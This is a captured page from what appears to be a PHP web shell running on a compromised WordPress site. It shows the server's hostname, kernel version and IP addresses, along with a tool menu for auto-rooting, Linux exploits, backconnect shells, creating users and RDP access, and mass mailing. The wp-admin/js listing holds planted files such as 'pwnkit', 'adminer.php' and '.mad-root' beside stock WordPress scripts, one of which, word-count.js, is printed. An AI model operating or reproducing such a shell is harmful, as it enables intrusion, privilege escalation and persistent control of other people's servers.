Linux webd123.cluster006.gra.hosting.ovh.net 5.15.162-ovh-vps-grsec-zfs-classid #1 SMP Mon Jul 15 08:28:44 UTC 2024 x86_64
Apache
: 10.6.40.122 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
zouerate
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
zouerate /
ZOUERATE.COM /
tobeuls /
wp-admin /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
cat.js
556
B
-rwxr--r--
categories.js
658
B
-rwxr--r--
comment.js
897
B
-rwxr--r--
common.js
1.26
KB
-rwxr--r--
custom-fields.js
968
B
-rwxr--r--
dbx-admin-key.js
1.76
KB
-rwxr--r--
edit-comments.js
2.53
KB
-rwxr--r--
editor.js
7.44
KB
-rwxr--r--
forms.js
859
B
-rwxr--r--
gallery.js
684
B
-rwxr--r--
link-cat.js
778
B
-rwxr--r--
link.js
1.7
KB
-rwxr--r--
media-upload.js
1.64
KB
-rwxr--r--
page.js
1.09
KB
-rwxr--r--
password-strength-meter.js
2.52
KB
-rwxr--r--
post.js
6.88
KB
-rwxr--r--
postbox.js
549
B
-rwxr--r--
pwnkit
10.99
KB
-rwxr-xr-x
revisions-js.php
2.92
KB
-rwxr--r--
slug.js
1.7
KB
-rwxr--r--
tags.js
547
B
-rwxr--r--
theme-preview.js
1.43
KB
-rwxr--r--
upload.js
12.91
KB
-rwxr--r--
users.js
49
B
-rwxr--r--
widgets.js
4.59
KB
-rwxr--r--
word-count.js
967
B
-rwxr--r--
wp-gears.js
2.69
KB
-rwxr--r--
xfn.js
1.26
KB
-rwxr--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : word-count.js
// Word count (function(JQ) { wpWordCount = { init : function() { var t = this, last = 0, co = JQ('#content'); JQ('#wp-word-count').html( wordCountL10n.count.replace( /%d/, '<span id="word-count">0</span>' ) ); t.block = 0; t.wc(co.val()); co.keyup( function(e) { if ( e.keyCode == last ) return true; if ( 13 == e.keyCode || 8 == last || 46 == last ) t.wc(co.val()); last = e.keyCode; return true; }); }, wc : function(tx) { var t = this, w = JQ('#word-count'), tc = 0; if ( t.block ) return; t.block = 1; setTimeout( function() { if ( tx ) { tx = tx.replace( /<.[^<>]*?>/g, ' ' ).replace( / /gi, ' ' ); tx = tx.replace( /[0-9.(),;:!?%#$¿'"_+=\\/-]*/g, '' ); tx.replace( /\S\s+/g, function(){tc++;} ); } w.html(tc.toString()); setTimeout( function() { t.block = 0; }, 2000 ); }, 1 ); } } }(jQuery)); jQuery(document).ready( function(){ wpWordCount.init(); } );
Close